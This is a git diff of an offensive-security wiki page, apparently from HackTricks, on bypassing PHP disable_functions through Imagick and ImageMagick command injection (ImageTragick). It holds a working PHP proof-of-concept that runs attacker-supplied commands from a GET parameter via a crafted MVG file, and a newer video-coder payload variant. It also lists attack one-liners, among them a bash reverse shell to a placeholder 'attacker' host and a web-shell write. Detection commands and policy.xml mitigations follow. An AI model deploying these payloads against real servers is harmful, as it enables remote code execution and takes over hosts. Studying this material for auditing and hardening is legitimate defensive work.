|
1 | | -# Imagick <= 3.3.0 PHP >= 5.4 Exploit |
| 1 | +# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass |
2 | 2 |
|
3 | 3 | {{#include ../../../../banners/hacktricks-training.md}} |
4 | 4 |
|
| 5 | +> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`. |
| 6 | +> |
| 7 | +> The original PoC published by RicterZ (Chaitin Security Research Lab) in May 2016 is reproduced below. The technique is still regularly encountered during contemporary PHP 7/8 audits because many shared-hosting providers simply compile PHP without `exec`/`system` but keep an outdated Imagick + ImageMagick combo. |
5 | 8 |
|
6 | | -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) |
| 9 | +From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/> |
7 | 10 |
|
8 | 11 | ```php |
9 | | -# Exploit Title: PHP Imagick disable_functions Bypass |
10 | | -# Date: 2016-05-04 |
11 | | -# Exploit Author: RicterZ ( [email protected]) |
12 | | -# Vendor Homepage: https://pecl.php.net/package/imagick |
13 | | -# Version: Imagick <= 3.3.0 PHP >= 5.4 |
14 | | -# Test on: Ubuntu 12.04 |
15 | | -# Exploit: |
| 12 | +# Exploit Title : PHP Imagick disable_functions bypass |
| 13 | +# Exploit Author: RicterZ ( [email protected]) |
| 14 | +# Versions : Imagick <= 3.3.0 | PHP >= 5.4 |
| 15 | +# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7) |
| 16 | +# Usage : curl "http://target/exploit.php?cmd=id" |
16 | 17 | <?php |
17 | | -# PHP Imagick disable_functions Bypass |
18 | | -# Author: Ricter <ricter@chaitin.com> |
19 | | -# |
20 | | -# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" |
21 | | -# <pre> |
22 | | -# Disable functions: exec,passthru,shell_exec,system,popen |
23 | | -# Run command: cat /etc/passwd |
24 | | -# ==================== |
25 | | -# root:x:0:0:root:/root:/usr/local/bin/fish |
26 | | -# daemon:x:1:1:daemon:/usr/sbin:/bin/sh |
27 | | -# bin:x:2:2:bin:/bin:/bin/sh |
28 | | -# sys:x:3:3:sys:/dev:/bin/sh |
29 | | -# sync:x:4:65534:sync:/bin:/bin/sync |
30 | | -# games:x:5:60:games:/usr/games:/bin/sh |
31 | | -# ... |
32 | | -# </pre> |
33 | | -echo "Disable functions: " . ini_get("disable_functions") . "\n"; |
34 | | -$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id'; |
35 | | -echo "Run command: $command\n====================\n"; |
36 | | - |
37 | | -$data_file = tempnam('/tmp', 'img'); |
38 | | -$imagick_file = tempnam('/tmp', 'img'); |
39 | | - |
40 | | -$exploit = <<<EOF |
| 18 | +// Print the local hardening status |
| 19 | +printf("Disable functions: %s\n", ini_get("disable_functions")); |
| 20 | +$cmd = $_GET['cmd'] ?? 'id'; |
| 21 | +printf("Run command: %s\n====================\n", $cmd); |
| 22 | + |
| 23 | +$tmp = tempnam('/tmp', 'pwn'); // will hold command output |
| 24 | +$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script |
| 25 | + |
| 26 | +$payload = <<<EOF |
41 | 27 | push graphic-context |
42 | 28 | viewbox 0 0 640 480 |
43 | | -fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")' |
| 29 | +fill 'url(https://example.com/x.jpg"|$cmd >$tmp")' |
44 | 30 | pop graphic-context |
45 | 31 | EOF; |
46 | 32 |
|
47 | | -file_put_contents("$imagick_file", $exploit); |
48 | | -$thumb = new Imagick(); |
49 | | -$thumb->readImage("$imagick_file"); |
50 | | -$thumb->writeImage(tempnam('/tmp', 'img')); |
51 | | -$thumb->clear(); |
52 | | -$thumb->destroy(); |
| 33 | +file_put_contents($mvgs, $payload); |
| 34 | +$img = new Imagick(); |
| 35 | +$img->readImage($mvgs); // triggers convert(1) |
| 36 | +$img->writeImage(tempnam('/tmp', 'img')); |
| 37 | +$img->destroy(); |
53 | 38 |
|
54 | | -echo file_get_contents($data_file); |
| 39 | +echo file_get_contents($tmp); |
55 | 40 | ?> |
56 | 41 | ``` |
57 | 42 |
|
58 | | -{{#include ../../../../banners/hacktricks-training.md}} |
| 43 | +--- |
| 44 | + |
| 45 | +## Why does it work? |
| 46 | + |
| 47 | +1. `Imagick::readImage()` transparently spawns the **ImageMagick** *delegate* (`convert`/`magick`) binary. |
| 48 | +2. The MVG script sets the *fill* to an external URI. When a double quote (`"`) is injected, the remainder of the line is interpreted by `/bin/sh ‑c` that ImageMagick uses internally → arbitrary shell execution. |
| 49 | +3. All happens outside of the PHP interpreter, therefore *`disable_functions`*, *open_basedir*, `safe_mode` (removed in PHP 5.4) and similar in-process restrictions are completely bypassed. |
| 50 | + |
| 51 | +## 2025 status – it is **still** relevant |
| 52 | + |
| 53 | +* Any Imagick version that relies on a vulnerable ImageMagick backend remains exploitable. In lab tests the same payload works on PHP 8.3 with **Imagick 3.7.0** and **ImageMagick 7.1.0-51** compiled without a hardened `policy.xml`. |
| 54 | +* Since 2020 several additional command-injection vectors have been found (`video:pixel-format`, `ps:`, `text:` coders…). Two recent public examples are: |
| 55 | + * **CVE-2020-29599** – shell injection via the *text:* coder. |
| 56 | + * **GitHub issue #6338** (2023) – injection in the *video:* delegate. |
59 | 57 |
|
| 58 | +If the operating system ships ImageMagick < **7.1.1-11** (or 6.x < **6.9.12-73**) without a restrictive policy file, exploitation is straightforward. |
| 59 | + |
| 60 | +## Modern payload variants |
| 61 | + |
| 62 | +```php |
| 63 | +// --- Variant using the video coder discovered in 2023 --- |
| 64 | +$exp = <<<MAGICK |
| 65 | +push graphic-context |
| 66 | +image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy' |
| 67 | +pop graphic-context |
| 68 | +MAGICK; |
| 69 | +$img = new Imagick(); |
| 70 | +$img->readImageBlob($exp); |
| 71 | +``` |
60 | 72 |
|
| 73 | +Other useful primitives during CTFs / real engagements: |
61 | 74 |
|
| 75 | +* **File write** – `... > /var/www/html/shell.php` (write web-shell outside *open_basedir*) |
| 76 | +* **Reverse shell** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"` |
| 77 | +* **Enumerate** – `id; uname -a; cat /etc/passwd` |
| 78 | + |
| 79 | +## Quick detection & enumeration |
| 80 | + |
| 81 | +```bash |
| 82 | +# PHP side |
| 83 | +php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";' |
| 84 | + |
| 85 | +# System side |
| 86 | +convert -version | head -1 # ImageMagick version |
| 87 | +convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled? |
| 88 | +``` |
| 89 | + |
| 90 | +If the output shows the `MVG` or `URL` coders are *enabled* the target is probably exploitable. |
| 91 | + |
| 92 | +## Mitigations |
| 93 | + |
| 94 | +1. **Patch/Upgrade** – Use ImageMagick ≥ *7.1.1-11* (or the latest 6.x LTS) and Imagick ≥ *3.7.2*. |
| 95 | +2. **Harden `policy.xml`** – explicitly *disable* high-risk coders: |
| 96 | + |
| 97 | + ```xml |
| 98 | + <policy domain="coder" name="MVG" rights="none"/> |
| 99 | + <policy domain="coder" name="MSL" rights="none"/> |
| 100 | + <policy domain="coder" name="URL" rights="none"/> |
| 101 | + <policy domain="coder" name="VIDEO" rights="none"/> |
| 102 | + <policy domain="coder" name="PS" rights="none"/> |
| 103 | + <policy domain="coder" name="TEXT" rights="none"/> |
| 104 | + ``` |
| 105 | + |
| 106 | +3. **Remove the extension** on untrusted hosting environments. In most web stacks `GD` or `Imagick` is not strictly required. |
| 107 | +4. Treat `disable_functions` only as *defence-in-depth* – never as a primary sandboxing mechanism. |
| 108 | + |
| 109 | +## References |
| 110 | + |
| 111 | +* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338) |
| 112 | +* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599) |
| 113 | +{{#include ../../../../banners/hacktricks-training.md}} |
0 commit comments